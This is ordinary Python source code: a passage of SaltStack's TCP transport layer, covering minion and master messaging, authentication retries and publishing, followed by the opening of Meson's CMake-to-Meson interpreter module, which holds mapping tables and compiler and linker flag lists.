if self._closing:
return
self._closing = True
if hasattr(self, 'message_client'):
self.message_client.close()
def __del__(self):
self.close()
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@tornado.gen.coroutine
def send_id(self, tok, force_auth):
'''
Send the minion id to the master so that the master may better
track the connection state of the minion.
In case of authentication errors, try to renegotiate authentication
and retry the method.
'''
load = {'id': self.opts['id'], 'tok': tok}
@tornado.gen.coroutine
def _do_transfer():
msg = self._package_load(self.auth.crypticle.dumps(load))
package = salt.transport.frame.frame_msg(msg, header=None)
yield self.message_client.write_to_stream(package)
raise tornado.gen.Return(True)
if force_auth or not self.auth.authenticated:
count = 0
while count <= self.opts['tcp_authentication_retries'] or self.opts['tcp_authentication_retries'] < 0:
try:
yield self.auth.authenticate()
break
except SaltClientError as exc:
log.debug(exc)
count += 1
try:
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def connect_callback(self, result):
if self._closing:
return
# Force re-auth on reconnect since the master
# may have been restarted
yield self.send_id(self.tok, self._reconnected)
self.connected = True
self.event.fire_event(
{'master': self.opts['master']},
'__master_connected'
)
if self._reconnected:
# On reconnects, fire a master event to notify that the minion is
# available.
if self.opts.get('__role') == 'syndic':
data = 'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
)
tag = salt.utils.event.tagify(
[self.opts['id'], 'start'],
'syndic'
)
else:
data = 'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
)
tag = salt.utils.event.tagify(
[self.opts['id'], 'start'],
'minion'
)
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': None,
'tok': self.tok,
'data': data,
'tag': tag}
req_channel = salt.utils.async.SyncWrapper(
AsyncTCPReqChannel, (self.opts,)
)
try:
req_channel.send(load, timeout=60)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
except Exception:
log.info('fire_master failed: %s', traceback.format_exc())
else:
self._reconnected = True
def disconnect_callback(self):
if self._closing:
return
self.connected = False
self.event.fire_event(
{'master': self.opts['master']},
'__master_disconnected'
)
@tornado.gen.coroutine
def connect(self):
try:
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.tok = self.auth.gen_token('salt')
if not self.auth.authenticated:
yield self.auth.authenticate()
if self.auth.authenticated:
self.message_client = SaltMessageClientPool(
self.opts,
args=(self.opts, self.opts['master_ip'], int(self.auth.creds['publish_port']),),
kwargs={'io_loop': self.io_loop,
'connect_callback': self.connect_callback,
'disconnect_callback': self.disconnect_callback,
'source_ip': self.opts.get('source_ip'),
'source_port': self.opts.get('source_publish_port')})
yield self.message_client.connect() # wait for the client to be connected
self.connected = True
# TODO: better exception handling...
except KeyboardInterrupt:
raise
except Exception as exc:
if '-|RETRY|-' not in six.text_type(exc):
raise SaltClientError('Unable to sign_in to master: {0}'.format(exc)) # TODO: better error message
def on_recv(self, callback):
'''
Register an on_recv callback
'''
if callback is None:
return self.message_client.on_recv(callback)
@tornado.gen.coroutine
def wrap_callback(body):
if not isinstance(body, dict):
# TODO: For some reason we need to decode here for things
# to work. Fix this.
body = msgpack.loads(body)
if six.PY3:
body = salt.transport.frame.decode_embedded_strs(body)
ret = yield self._decode_payload(body)
callback(ret)
return self.message_client.on_recv(wrap_callback)
class TCPReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel):
# TODO: opts!
backlog = 5
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._socket = None
@property
def socket(self):
return self._socket
def close(self):
if self._socket is not None:
try:
self._socket.shutdown(socket.SHUT_RDWR)
except socket.error as exc:
if exc.errno == errno.ENOTCONN:
# We may try to shutdown a socket which is already disconnected.
# Ignore this condition and continue.
pass
else:
raise exc
self._socket.close()
self._socket = None
def __del__(self):
self.close()
def pre_fork(self, process_manager):
'''
Pre-fork we need to create the zmq router device
'''
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
if USE_LOAD_BALANCER:
self.socket_queue = multiprocessing.Queue()
process_manager.add_process(
LoadBalancerServer, args=(self.opts, self.socket_queue)
)
elif not salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
def post_fork(self, payload_handler, io_loop):
'''
After forking we need to create all of the local sockets to listen to the
router
payload_handler: function to call with your payloads
'''
self.payload_handler = payload_handler
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
if USE_LOAD_BALANCER:
self.req_server = LoadBalancerWorker(self.socket_queue,
self.handle_message,
io_loop=self.io_loop,
ssl_options=self.opts.get('ssl'))
else:
if salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
self.req_server = SaltMessageServer(self.handle_message,
io_loop=self.io_loop,
ssl_options=self.opts.get('ssl'))
self.req_server.add_socket(self._socket)
self._socket.listen(self.backlog)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop)
@tornado.gen.coroutine
def handle_message(self, stream, header, payload):
'''
Handle incoming messages from underylying tcp streams
'''
try:
try:
payload = self._decode_payload(payload)
except Exception:
stream.write(salt.transport.frame.frame_msg('bad load', header=header))
raise tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict):
yield stream.write(salt.transport.frame.frame_msg(
'payload and load must be a dict', header=header))
raise tornado.gen.Return()
try:
id_ = payload['load'].get('id', '')
if '\0' in id_:
log.error('Payload contains an id with a null byte: %s', payload)
stream.send(self.serial.dumps('bad load: id contains a null byte'))
raise tornado.gen.Return()
except TypeError:
log.error('Payload contains non-string id: %s', payload)
stream.send(self.serial.dumps('bad load: id {0} is not a string'.format(id_)))
raise tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth':
yield stream.write(salt.transport.frame.frame_msg(
self._auth(payload['load']), header=header))
raise tornado.gen.Return()
# TODO: test
try:
ret, req_opts = yield self.payload_handler(payload)
except Exception as e:
# always attempt to return an error to the minion
stream.write('Some exception handling minion payload')
log.error('Some exception handling a payload from minion', exc_info=True)
stream.close()
raise tornado.gen.Return()
req_fun = req_opts.get('fun', 'send')
if req_fun == 'send_clear':
stream.write(salt.transport.frame.frame_msg(ret, header=header))
elif req_fun == 'send':
stream.write(salt.transport.frame.frame_msg(self.crypticle.dumps(ret), header=header))
elif req_fun == 'send_private':
stream.write(salt.transport.frame.frame_msg(self._encrypt_private(ret,
req_opts['key'],
req_opts['tgt'],
), header=header))
else:
log.error('Unknown req_fun %s', req_fun)
# always attempt to return an error to the minion
stream.write('Server-side exception handling payload')
stream.close()
except tornado.gen.Return:
raise
except tornado.iostream.StreamClosedError:
# Stream was closed. This could happen if the remote side
# closed the connection on its end (eg in a timeout or shutdown
# situation).
log.error('Connection was unexpectedly closed', exc_info=True)
except Exception as exc: # pylint: disable=broad-except
# Absorb any other exceptions
log.error('Unexpected exception occurred: %s', exc, exc_info=True)
raise tornado.gen.Return()
class SaltMessageServer(tornado.tcpserver.TCPServer, object):
'''
Raw TCP server which will receive all of the TCP streams and re-assemble
messages that are sent through to us
'''
def __init__(self, message_handler, *args, **kwargs):
super(SaltMessageServer, self).__init__(*args, **kwargs)
self.clients = []
self.message_handler = message_handler
@tornado.gen.coroutine
def handle_stream(self, stream, address):
'''
Handle incoming streams and add messages to the incoming queue
'''
log.trace('Req client %s connected', address)
self.clients.append((stream, address))
unpacker = msgpack.Unpacker()
try:
while True:
wire_bytes = yield stream.read_bytes(4096, partial=True)
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
if six.PY3:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
header = framed_msg['head']
self.io_loop.spawn_callback(self.message_handler, stream, header, framed_msg['body'])
except tornado.iostream.StreamClosedError:
log.trace('req client disconnected %s', address)
self.clients.remove((stream, address))
except Exception as e:
log.trace('other master-side exception: %s', e)
self.clients.remove((stream, address))
stream.close()
def shutdown(self):
'''
Shutdown the whole server
'''
for item in self.clients:
client, address = item
client.close()
self.clients.remove(item)
if USE_LOAD_BALANCER:
class LoadBalancerWorker(SaltMessageServer):
'''
This will receive TCP connections from 'LoadBalancerServer' via
a multiprocessing queue.
Since the queue is shared amongst workers, only one worker will handle
a given connection.
'''
def __init__(self, socket_queue, message_handler, *args, **kwargs):
super(LoadBalancerWorker, self).__init__(
message_handler, *args, **kwargs)
self.socket_queue = socket_queue
t = threading.Thread(target=self.socket_queue_thread)
t.start()
def socket_queue_thread(self):
try:
while True:
client_socket, address = self.socket_queue.get(True, None)
# 'self.io_loop' initialized in super class
# 'tornado.tcpserver.TCPServer'.
# 'self._handle_connection' defined in same super class.
self.io_loop.spawn_callback(
self._handle_connection, client_socket, address)
except (KeyboardInterrupt, SystemExit):
pass
class TCPClientKeepAlive(tornado.tcpclient.TCPClient):
'''
Override _create_stream() in TCPClient to enable keep alive support.
'''
def __init__(self, opts, resolver=None, io_loop=None):
self.opts = opts
super(TCPClientKeepAlive, self).__init__(
resolver=resolver, io_loop=io_loop)
def _create_stream(self, max_buffer_size, af, addr, **kwargs): # pylint: disable=unused-argument
'''
Override _create_stream() in TCPClient.
Tornado 4.5 added the kwargs 'source_ip' and 'source_port'.
Due to this, use **kwargs to swallow these and any future
kwargs to maintain compatibility.
'''
# Always connect in plaintext; we'll convert to ssl if necessary
# after one connection has completed.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_set_tcp_keepalive(sock, self.opts)
stream = tornado.iostream.IOStream(
sock,
io_loop=self.io_loop,
max_buffer_size=max_buffer_size)
return stream.connect(addr)
class SaltMessageClientPool(salt.transport.MessageClientPool):
'''
Wrapper class of SaltMessageClient to avoid blocking waiting while writing data to socket.
'''
def __init__(self, opts, args=None, kwargs=None):
super(SaltMessageClientPool, self).__init__(SaltMessageClient, opts, args=args, kwargs=kwargs)
def __del__(self):
self.close()
def close(self):
for message_client in self.message_clients:
message_client.close()
self.message_clients = []
@tornado.gen.coroutine
def connect(self):
futures = []
for message_client in self.message_clients:
futures.append(message_client.connect())
for future in futures:
yield future
raise tornado.gen.Return(None)
def on_recv(self, *args, **kwargs):
for message_client in self.message_clients:
message_client.on_recv(*args, **kwargs)
def send(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0].send(*args, **kwargs)
def write_to_stream(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0]._stream.write(*args, **kwargs)
# TODO consolidate with IPCClient
# TODO: limit in-flight messages.
# TODO: singleton? Something to not re-create the tcp connection so much
class SaltMessageClient(object):
'''
Low-level message sending client
'''
def __init__(self, opts, host, port, io_loop=None, resolver=None,
connect_callback=None, disconnect_callback=None,
source_ip=None, source_port=None):
self.opts = opts
self.host = host
self.port = port
self.source_ip = source_ip
self.source_port = source_port
self.connect_callback = connect_callback
self.disconnect_callback = disconnect_callback
self.io_loop = io_loop or tornado.ioloop.IOLoop.current()
self._tcp_client = TCPClientKeepAlive(
opts, io_loop=self.io_loop, resolver=resolver)
self._mid = 1
self._max_messages = int((1 << 31) - 2) # number of IDs before we wrap
# TODO: max queue size
self.send_queue = [] # queue of messages to be sent
self.send_future_map = {} # mapping of request_id -> Future
self.send_timeout_map = {} # request_id -> timeout_callback
self._read_until_future = None
self._on_recv = None
self._closing = False
self._connecting_future = self.connect()
self._stream_return_future = tornado.concurrent.Future()
self.io_loop.spawn_callback(self._stream_return)
# TODO: timeout inflight sessions
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, '_stream') and not self._stream.closed():
self._stream.close()
if self._read_until_future is not None:
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
self._read_until_future.exc_info()
if (not self._stream_return_future.done() and
self.io_loop != tornado.ioloop.IOLoop.current(
instance=False)):
# If _stream_return() hasn't completed, it means the IO
# Loop is stopped (such as when using
# 'salt.utils.async.SyncWrapper'). Ensure that
# _stream_return() completes by restarting the IO Loop.
# This will prevent potential errors on shutdown.
orig_loop = tornado.ioloop.IOLoop.current()
self.io_loop.make_current()
try:
self.io_loop.add_future(
self._stream_return_future,
lambda future: self.io_loop.stop()
)
self.io_loop.start()
finally:
orig_loop.make_current()
self._tcp_client.close()
# Clear callback references to allow the object that they belong to
# to be deleted.
self.connect_callback = None
self.disconnect_callback = None
def __del__(self):
self.close()
def connect(self):
'''
Ask for this client to reconnect to the origin
'''
if hasattr(self, '_connecting_future') and not self._connecting_future.done():
future = self._connecting_future
else:
future = tornado.concurrent.Future()
self._connecting_future = future
self.io_loop.add_callback(self._connect)
# Add the callback only when a new future is created
if self.connect_callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(self.connect_callback, response)
future.add_done_callback(handle_future)
return future
# TODO: tcp backoff opts
@tornado.gen.coroutine
def _connect(self):
'''
Try to connect for the rest of time!
'''
while True:
if self._closing:
break
try:
if (self.source_ip or self.source_port) and tornado.version_info >= (4, 5):
### source_ip and source_port are supported only in Tornado >= 4.5
# See http://www.tornadoweb.org/en/stable/releases/v4.5.0.html
# Otherwise will just ignore these args
self._stream = yield self._tcp_client.connect(self.host,
self.port,
ssl_options=self.opts.get('ssl'),
source_ip=self.source_ip,
source_port=self.source_port)
else:
if self.source_ip or self.source_port:
log.warning('If you need a certain source IP/port, consider upgrading Tornado >= 4.5')
self._stream = yield self._tcp_client.connect(self.host,
self.port,
ssl_options=self.opts.get('ssl'))
self._connecting_future.set_result(True)
break
except Exception as e:
yield tornado.gen.sleep(1) # TODO: backoff
#self._connecting_future.set_exception(e)
@tornado.gen.coroutine
def _stream_return(self):
try:
while not self._closing and (
not self._connecting_future.done() or
self._connecting_future.result() is not True):
yield self._connecting_future
unpacker = msgpack.Unpacker()
while not self._closing:
try:
self._read_until_future = self._stream.read_bytes(4096, partial=True)
wire_bytes = yield self._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
if six.PY3:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
header = framed_msg['head']
body = framed_msg['body']
message_id = header.get('mid')
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_result(body)
self.remove_message_timeout(message_id)
else:
if self._on_recv is not None:
self.io_loop.spawn_callback(self._on_recv, header, body)
else:
log.error('Got response for message_id %s that we are not tracking', message_id)
except tornado.iostream.StreamClosedError as e:
log.debug('tcp stream to %s:%s closed, unable to recv', self.host, self.port)
for future in six.itervalues(self.send_future_map):
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
except TypeError:
# This is an invalid transport
if 'detect_mode' in self.opts:
log.info('There was an error trying to use TCP transport; '
'attempting to fallback to another transport')
else:
raise SaltClientError
except Exception as e:
log.error('Exception parsing response', exc_info=True)
for future in six.itervalues(self.send_future_map):
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
finally:
self._stream_return_future.set_result(True)
@tornado.gen.coroutine
def _stream_send(self):
while not self._connecting_future.done() or self._connecting_future.result() is not True:
yield self._connecting_future
while len(self.send_queue) > 0:
message_id, item = self.send_queue[0]
try:
yield self._stream.write(item)
del self.send_queue[0]
# if the connection is dead, lets fail this send, and make sure we
# attempt to reconnect
except tornado.iostream.StreamClosedError as e:
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_exception(e)
self.remove_message_timeout(message_id)
del self.send_queue[0]
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
def _message_id(self):
wrap = False
while self._mid in self.send_future_map:
if self._mid >= self._max_messages:
if wrap:
# this shouldn't ever happen, but just in case
raise Exception('Unable to find available messageid')
self._mid = 1
wrap = True
else:
self._mid += 1
return self._mid
# TODO: return a message object which takes care of multiplexing?
def on_recv(self, callback):
'''
Register a callback for received messages (that we didn't initiate)
'''
if callback is None:
self._on_recv = callback
else:
def wrap_recv(header, body):
callback(body)
self._on_recv = wrap_recv
def remove_message_timeout(self, message_id):
if message_id not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message_id)
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message_id):
if message_id in self.send_timeout_map:
del self.send_timeout_map[message_id]
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_exception(
SaltReqTimeoutError('Message timed out')
)
def send(self, msg, timeout=None, callback=None, raw=False):
'''
Send given message, and return a future
'''
message_id = self._message_id()
header = {'mid': message_id}
future = tornado.concurrent.Future()
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message_id] = future
if self.opts.get('detect_mode') is True:
timeout = 1
if timeout is not None:
send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message_id)
self.send_timeout_map[message_id] = send_timeout
# if we don't have a send queue, we need to spawn the callback to do the sending
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._stream_send)
self.send_queue.append((message_id, salt.transport.frame.frame_msg(msg, header=header)))
return future
class Subscriber(object):
'''
Client object for use with the TCP publisher server
'''
def __init__(self, stream, address):
self.stream = stream
self.address = address
self._closing = False
self._read_until_future = None
self.id_ = None
def close(self):
if self._closing:
return
self._closing = True
if not self.stream.closed():
self.stream.close()
if self._read_until_future is not None:
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
self._read_until_future.exc_info()
def __del__(self):
self.close()
class PubServer(tornado.tcpserver.TCPServer, object):
'''
TCP publisher
'''
def __init__(self, opts, io_loop=None):
super(PubServer, self).__init__(io_loop=io_loop, ssl_options=opts.get('ssl'))
self.opts = opts
self._closing = False
self.clients = set()
self.aes_funcs = salt.master.AESFuncs(self.opts)
self.present = {}
self.presence_events = False
if self.opts.get('presence_events', False):
tcp_only = True
for transport, _ in iter_transport_opts(self.opts):
if transport != 'tcp':
tcp_only = False
if tcp_only:
# Only when the transport is TCP only, the presence events will
# be handled here. Otherwise, it will be handled in the
# 'Maintenance' process.
self.presence_events = True
if self.presence_events:
self.event = salt.utils.event.get_event(
'master',
opts=self.opts,
listen=False
)
def close(self):
if self._closing:
return
self._closing = True
def __del__(self):
self.close()
def _add_client_present(self, client):
id_ = client.id_
if id_ in self.present:
clients = self.present[id_]
clients.add(client)
else:
self.present[id_] = set([client])
if self.presence_events:
data = {'new': [id_],
'lost': []}
self.event.fire_event(
data,
salt.utils.event.tagify('change', 'presence')
)
data = {'present': list(self.present.keys())}
self.event.fire_event(
data,
salt.utils.event.tagify('present', 'presence')
)
def _remove_client_present(self, client):
id_ = client.id_
if id_ is None or id_ not in self.present:
# This is possible if _remove_client_present() is invoked
# before the minion's id is validated.
return
clients = self.present[id_]
if client not in clients:
# Since _remove_client_present() is potentially called from
# _stream_read() and/or publish_payload(), it is possible for
# it to be called twice, in which case we will get here.
# This is not an abnormal case, so no logging is required.
return
clients.remove(client)
if len(clients) == 0:
del self.present[id_]
if self.presence_events:
data = {'new': [],
'lost': [id_]}
self.event.fire_event(
data,
salt.utils.event.tagify('change', 'presence')
)
data = {'present': list(self.present.keys())}
self.event.fire_event(
data,
salt.utils.event.tagify('present', 'presence')
)
@tornado.gen.coroutine
def _stream_read(self, client):
unpacker = msgpack.Unpacker()
while not self._closing:
try:
client._read_until_future = client.stream.read_bytes(4096, partial=True)
wire_bytes = yield client._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
if six.PY3:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
body = framed_msg['body']
if body['enc'] != 'aes':
# We only accept 'aes' encoded messages for 'id'
continue
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
load = crypticle.loads(body['load'])
if six.PY3:
load = salt.transport.frame.decode_embedded_strs(load)
if not self.aes_funcs.verify_minion(load['id'], load['tok']):
continue
client.id_ = load['id']
self._add_client_present(client)
except tornado.iostream.StreamClosedError as e:
log.debug('tcp stream to %s closed, unable to recv', client.address)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
break
except Exception as e:
log.error('Exception parsing response', exc_info=True)
continue
def handle_stream(self, stream, address):
log.trace('Subscriber at %s connected', address)
client = Subscriber(stream, address)
self.clients.add(client)
self.io_loop.spawn_callback(self._stream_read, client)
# TODO: ACK the publish through IPC
@tornado.gen.coroutine
def publish_payload(self, package, _):
log.debug('TCP PubServer sending payload: %s', package)
payload = salt.transport.frame.frame_msg(package['payload'])
to_remove = []
if 'topic_lst' in package:
topic_lst = package['topic_lst']
for topic in topic_lst:
if topic in self.present:
# This will rarely be a list of more than 1 item. It will
# be more than 1 item if the minion disconnects from the
# master in an unclean manner (eg cable yank), then
# restarts and the master is yet to detect the disconnect
# via TCP keep-alive.
for client in self.present[topic]:
try:
# Write the packed str
f = client.stream.write(payload)
self.io_loop.add_future(f, lambda f: True)
except tornado.iostream.StreamClosedError:
to_remove.append(client)
else:
log.debug('Publish target %s not connected', topic)
else:
for client in self.clients:
try:
# Write the packed str
f = client.stream.write(payload)
self.io_loop.add_future(f, lambda f: True)
except tornado.iostream.StreamClosedError:
to_remove.append(client)
for client in to_remove:
log.debug('Subscriber at %s has disconnected from publisher', client.address)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
log.trace('TCP PubServer finished publishing payload')
class TCPPubServerChannel(salt.transport.server.PubServerChannel):
# TODO: opts!
# Based on default used in tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.io_loop = None
def __setstate__(self, state):
salt.master.SMaster.secrets = state['secrets']
self.__init__(state['opts'])
def __getstate__(self):
return {'opts': self.opts,
'secrets': salt.master.SMaster.secrets}
def _publish_daemon(self, log_queue=None):
'''
Bind to the interface specified in the configuration file
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
if log_queue is not None:
salt.log.setup.set_multiprocessing_logging_queue(log_queue)
salt.log.setup.setup_multiprocessing_logging(log_queue)
# Check if io_loop was set outside
if self.io_loop is None:
self.io_loop = tornado.ioloop.IOLoop.current()
# Spin up the publisher
pub_server = PubServer(self.opts, io_loop=self.io_loop)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(sock, self.opts)
sock.setblocking(0)
sock.bind((self.opts['interface'], int(self.opts['publish_port'])))
sock.listen(self.backlog)
# pub_server will take ownership of the socket
pub_server.add_socket(sock)
# Set up Salt IPC server
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = int(self.opts.get('tcp_master_publish_pull', 4514))
else:
pull_uri = os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
pull_sock = salt.transport.ipc.IPCMessageServer(
pull_uri,
io_loop=self.io_loop,
payload_handler=pub_server.publish_payload,
)
# Securely create socket
log.info('Starting the Salt Puller on %s', pull_uri)
old_umask = os.umask(0o177)
try:
pull_sock.start()
finally:
os.umask(old_umask)
# run forever
try:
self.io_loop.start()
except (KeyboardInterrupt, SystemExit):
salt.log.setup.shutdown_multiprocessing_logging()
def pre_fork(self, process_manager):
'''
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
'''
kwargs = {}
if salt.utils.platform.is_windows():
kwargs['log_queue'] = (
salt.log.setup.get_multiprocessing_logging_queue()
)
process_manager.add_process(self._publish_daemon, kwargs=kwargs)
def publish(self, load):
'''
Publish "load" to minions
'''
payload = {'enc': 'aes'}
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
payload['load'] = crypticle.dumps(load)
if self.opts['sign_pub_messages']:
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
log.debug("Signing data packet")
payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load'])
# Use the Salt IPC server
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = int(self.opts.get('tcp_master_publish_pull', 4514))
else:
pull_uri = os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
# TODO: switch to the actual async interface
#pub_sock = salt.transport.ipc.IPCMessageClient(self.opts, io_loop=self.io_loop)
pub_sock = salt.utils.async.SyncWrapper(
salt.transport.ipc.IPCMessageClient,
(pull_uri,)
)
pub_sock.connect()
int_payload = {'payload': self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load['tgt_type'] == 'list':
int_payload['topic_lst'] = load['tgt']
# Send it over IPC!
pub_sock.send(int_payload)
|
interpreter.py | # Copyright 2019 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This class contains the basic functionality needed to run any interpreter
# or an interpreter-based tool.
from .common import CMakeException
from .client import CMakeClient, RequestCMakeInputs, RequestConfigure, RequestCompute, RequestCodeModel, CMakeTarget
from .executor import CMakeExecutor
from .traceparser import CMakeTraceParser, CMakeGeneratorTarget
from .. import mlog
from ..environment import Environment
from ..mesonlib import MachineChoice
from ..compilers.compilers import lang_suffixes, header_suffixes, obj_suffixes, is_header
from subprocess import Popen, PIPE
from typing import Any, List, Dict, Optional, TYPE_CHECKING
from threading import Thread
import os, re
from ..mparser import (
Token,
BaseNode,
CodeBlockNode,
FunctionNode,
ArrayNode,
ArgumentNode,
AssignmentNode,
BooleanNode,
StringNode,
IdNode,
IndexNode,
MethodNode,
NumberNode,
)
if TYPE_CHECKING:
from ..build import Build
from ..backend.backends import Backend
backend_generator_map = {
'ninja': 'Ninja',
'xcode': 'Xcode',
'vs2010': 'Visual Studio 10 2010',
'vs2015': 'Visual Studio 15 2017',
'vs2017': 'Visual Studio 15 2017',
'vs2019': 'Visual Studio 16 2019',
}
language_map = {
'c': 'C',
'cpp': 'CXX',
'cuda': 'CUDA',
'cs': 'CSharp',
'java': 'Java',
'fortran': 'Fortran',
'swift': 'Swift',
}
target_type_map = {
'STATIC_LIBRARY': 'static_library',
'MODULE_LIBRARY': 'shared_module',
'SHARED_LIBRARY': 'shared_library',
'EXECUTABLE': 'executable',
'OBJECT_LIBRARY': 'static_library',
'INTERFACE_LIBRARY': 'header_only'
}
target_type_requires_trace = ['INTERFACE_LIBRARY']
skip_targets = ['UTILITY']
blacklist_compiler_flags = [
'/W1', '/W2', '/W3', '/W4', '/Wall',
'/O1', '/O2', '/Ob', '/Od', '/Og', '/Oi', '/Os', '/Ot', '/Ox', '/Oy', '/Ob0',
'/RTC1', '/RTCc', '/RTCs', '/RTCu'
]
blacklist_link_flags = [
'/machine:x64', '/machine:x86', '/machine:arm', '/machine:ebc',
'/debug', '/debug:fastlink', '/debug:full', '/debug:none',
'/incremental',
]
blacklist_clang_cl_link_flags = ['/GR', '/EHsc', '/MDd', '/Zi', '/RTC1']
blacklist_link_libs = [
'kernel32.lib',
'user32.lib',
'gdi32.lib',
'winspool.lib',
'shell32.lib',
'ole32.lib',
'oleaut32.lib',
'uuid.lib',
'comdlg32.lib',
'advapi32.lib'
]
# Utility functions to generate local keys
def _target_key(tgt_name: str) -> str:
return '__tgt_{}__'.format(tgt_name)
def _generated_file_key(fname: str) -> str:
return '__gen_{}__'.format(os.path.basename(fname))
class ConverterTarget:
lang_cmake_to_meson = {val.lower(): key for key, val in language_map.items()}
def __init__(self, target: CMakeTarget, env: Environment):
self.env = env
self.artifacts = target.artifacts
self.src_dir = target.src_dir
self.build_dir = target.build_dir
self.name = target.name
self.full_name = target.full_name
self.type = target.type
self.install = target.install
self.install_dir = ''
self.link_libraries = target.link_libraries
self.link_flags = target.link_flags + target.link_lang_flags
if target.install_paths:
self.install_dir = target.install_paths[0]
self.languages = []
self.sources = []
self.generated = []
self.includes = []
self.link_with = []
self.object_libs = []
self.compile_opts = {}
self.public_compile_opts = []
self.pie = False
# Project default override options (c_std, cpp_std, etc.)
self.override_options = []
for i in target.files:
# Determine the meson language
lang = ConverterTarget.lang_cmake_to_meson.get(i.language.lower(), 'c')
if lang not in self.languages:
self.languages += [lang]
if lang not in self.compile_opts:
self.compile_opts[lang] = []
# Add arguments, but avoid duplicates
args = i.flags
args += ['-D{}'.format(x) for x in i.defines]
self.compile_opts[lang] += [x for x in args if x not in self.compile_opts[lang]]
# Handle include directories
self.includes += [x for x in i.includes if x not in self.includes]
# Add sources to the right array
